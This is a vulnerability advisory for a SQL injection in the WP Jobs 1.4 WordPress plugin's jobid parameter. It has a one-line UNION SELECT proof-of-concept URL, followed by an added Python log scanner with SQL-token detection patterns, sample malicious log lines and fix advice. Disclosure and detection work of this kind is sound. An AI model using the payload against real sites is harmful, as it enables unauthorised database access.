CVE-2017-9603: WordPress WP Jobs v.1.4 SQL Injection (SQLi)

Identification Date: 11/06/2017
Vendor Homepage: http://www.intensewp.com/
Software Link: https://en-gb.wordpress.org/plugins/wp-jobs/

Description

SQL injection vulnerability in the WP Jobs plug-in 1.4 for WordPress allows an authenticated user to execute arbitrary SQL commands via the jobid parameter.

Proof of Concept

In order to replay the attack, use the link below.

http://[wordpress_site]/wp-admin/edit.php?post_type=job&page=WPJobsJobApps&jobid=5 UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL-- comment

The results of the SQL injection are…
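A detection-side companion to the advisory, added here and not part of the original post or the plugin: it scans web-server access logs for requests to the WPJobsJobApps admin page whose jobid value is not the plain integer the plugin expects. The log line format and the sample entries are constructed for this example; adapt REQUEST_RE to your own log format.

```python
"""Flag web-log requests that tamper with the WP Jobs `jobid` parameter.
Log format (Apache/nginx style, request in double quotes) is an assumption
of this example, not something the advisory specifies."""
import re
from typing import Iterable, Iterator, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

TARGET_PAGE = "WPJobsJobApps"  # admin page named in the advisory
# Tokens that never belong in a numeric job id (keywords, comments, quotes).
SQL_TOKENS = re.compile(r"\b(union|select|sleep|benchmark)\b|@@|--|/\*|'", re.I)
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def classify_request(path: str) -> Optional[str]:
    """Return a reason if the request looks like jobid abuse, else None."""
    parts = urlsplit(path)
    if not parts.path.endswith("/wp-admin/edit.php"):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    if qs.get("page", [""])[0] != TARGET_PAGE or "jobid" not in qs:
        return None
    jobid = qs["jobid"][0]
    if jobid.strip().isdigit():
        return None  # the integer the plugin expects
    if SQL_TOKENS.search(jobid):
        return f"SQL tokens in jobid: {jobid!r}"
    return f"non-numeric jobid: {jobid!r}"


def scan_log(lines: Iterable[str]) -> Iterator[Tuple[int, str]]:
    """Yield (line_number, reason) for every suspicious request."""
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        reason = classify_request(m.group(1)) if m else None
        if reason:
            yield n, reason


# Constructed sample lines, not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - admin [11/Jun/2017:10:00:00 +0000] "GET /wp-admin/edit.php?post_type=job&page=WPJobsJobApps&jobid=5 HTTP/1.1" 200 512',
    '10.0.0.9 - editor [11/Jun/2017:10:00:01 +0000] "GET /wp-admin/edit.php?post_type=job&page=WPJobsJobApps&jobid=5%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,@@version,NULL,NULL-- HTTP/1.1" 200 4096',
    '10.0.0.9 - editor [11/Jun/2017:10:00:02 +0000] "GET /wp-admin/edit.php?post_type=job&page=WPJobsJobApps&jobid=5%27 HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for n, reason in scan_log(SAMPLE_LOG):
        print(f"line {n}: {reason}")
```

A hit on this check is also the signal that the plugin-side fix is needed: the jobid value should be cast to an integer (or bound through $wpdb->prepare) before it reaches the query.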
